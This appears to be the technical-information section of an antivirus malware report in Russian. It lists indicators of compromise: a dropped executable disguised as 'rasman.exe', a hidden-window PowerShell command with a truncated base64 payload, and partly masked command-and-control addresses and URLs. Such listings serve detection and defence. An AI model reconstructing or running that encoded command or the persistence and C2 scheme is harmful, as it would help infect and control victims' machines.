Техническая информация
- 'rasman' "%WINDIR%\SysWOW64\XAPOFX1_3\rasman.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAEQASgBSAEoAbwBjAGEAPQAnAE4ARABYAEYAUwBwAGwAZwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwB1AGAAUgBpAGAAVAB5AFAAUgBPAFQAbwBgAGMAYABvAGwAIgAgAD...
- %HOMEPATH%\674.exe
- %WINDIR%\syswow64\xapofx1_3\rasman.exe
- %HOMEPATH%\674.exe в %WINDIR%\syswow64\xapofx1_3\rasman.exe
- '47.##6.117.214':80
- '62.##8.54.22':8080
- '21#.#1.142.238':8080
- '19#.#60.53.126':80
- '87.##6.136.232':8080
- '74.##8.45.104':8080
- '12#.#24.124.40':7080
- '12#.#5.106.173':443
- http://www.if###oves.net/option-tree/age9k_r7p_0l2/
- http://47.##6.117.214/Fsa3uIgkwXyH9ck/3GbEEzb4U/F0FHtMDF/1KCDjp/DGAolLWX/u4m89z3Ac0mBZBWIgQe/
- http://21#.##.142.238:8080/3LzaUai2aicxCCAFGdo/gb4VNcEtaDqJ9ZwTsE7/ via 21#.#1.142.238
- http://12#.##.106.173:443/1X5Ibn5o1/AAUlsC/ via 12#.#5.106.173
- DNS ASK if###oves.net
- '%HOMEPATH%\674.exe'
- '%WINDIR%\syswow64\xapofx1_3\rasman.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAEQASgBSAEoAbwBjAGEAPQAnAE4ARABYAEYAUwBwAGwAZwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwB1AGAAUgBpAGAAVAB5AFAAUgBPAFQAbwBgAGMAYABvAGwAIgAgAD...' (со скрытым окном)